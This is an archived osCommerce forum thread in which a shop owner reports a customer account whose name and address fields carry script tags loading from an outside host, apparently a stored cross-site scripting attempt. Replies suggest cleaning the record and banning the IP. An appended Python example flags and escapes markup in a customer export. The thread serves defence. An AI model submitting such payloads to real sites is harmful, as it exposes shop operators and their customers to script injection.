osCommerce

Do I need to worry about this?


greasemonkey

Using 2.3.4 BS

And I've had a customer just create an account with the following details.... looks like someone is trying to inject something?

23311;"18636";NULL;"""__script src=//xss.tv/lkvzyF__/script_";"Linda";"Juan""__script src=//xss.tv/lkvzyF__/script_";"24 Cyprus""__script src=//xss.tv/lkvzyF__/script_";;"T1P 1N1";"Hiram""__script src=http://xss.tv/lkvzyF__/script_";;"38";"66"

 


It certainly looks like they're trying to do something nasty. Even if this isn't successful against an osC installation, I would still (at a minimum) manually edit their account information to remove the suspicious stuff. If it comes back, delete their account and IP ban them.


@MrPhil thanks for the advice - I've done that.

And crossed my fingers....

I presumed this type of attack would not be successful .... But when it's such a blatant attempt I get kinda scared.

Maybe the customer has a virus that is trying to do the injection? Or maybe from a public wifi? The customer seems legit.


If you think it might be accidental because their PC has been zombified, perhaps they'd appreciate a "heads up" notice that their PC may be sick. On the other hand, if they're deliberately trying to "get" you, they now know that you watch for such things and are on alert (and thus not a good target for further attempts).


This topic is now archived and is closed to further replies.
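
An added example, not part of the original thread and not osCommerce code: a small audit over a customer-table export that flags fields containing markup, like the row in the first post, and returns them HTML-escaped so they can be reviewed or displayed as inert text. The export layout, the column order and the host `example.invalid` are constructed assumptions.

```python
import csv
import html
import io
import re

# Constructed sample export (semicolon-separated, quoted), modelled on the row
# in the first post. Names, addresses and the host are placeholders.
SAMPLE_EXPORT = '''101;"Alice";"Smith";"1 High Street";"Calgary"
102;"Linda";"Juan""><script src=//example.invalid/x></script>";"24 Cyprus";"Hiram"
103;"Bob";"O'Neil";"5 King's Road";"Leeds"
'''

# Characters and patterns that do not belong in a name or address field:
# angle brackets, javascript: URLs, and inline event handlers such as onerror=.
SUSPICIOUS = re.compile(r"[<>]|\bjavascript:|\bon\w+\s*=", re.IGNORECASE)


def audit_export(text):
    """Return (customer_id, column_index, escaped_value) for each flagged field."""
    findings = []
    # Doubled quotes inside a quoted field decode to one literal quote,
    # which is how the payload's leading '"' appears in the export.
    reader = csv.reader(io.StringIO(text), delimiter=";", quotechar='"')
    for row in reader:
        if not row:
            continue
        customer_id = row[0]
        for index, value in enumerate(row[1:], start=1):
            if SUSPICIOUS.search(value):
                # html.escape gives the form that is safe to show in an admin
                # page or report: the markup is rendered as text, not executed.
                findings.append((customer_id, index, html.escape(value, quote=True)))
    return findings


if __name__ == "__main__":
    for customer_id, index, safe_value in audit_export(SAMPLE_EXPORT):
        print(f"customer {customer_id} column {index}: {safe_value}")
```

Legitimate punctuation such as the apostrophes in the third sample row is not flagged; only fields carrying markup are reported for manual cleanup.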
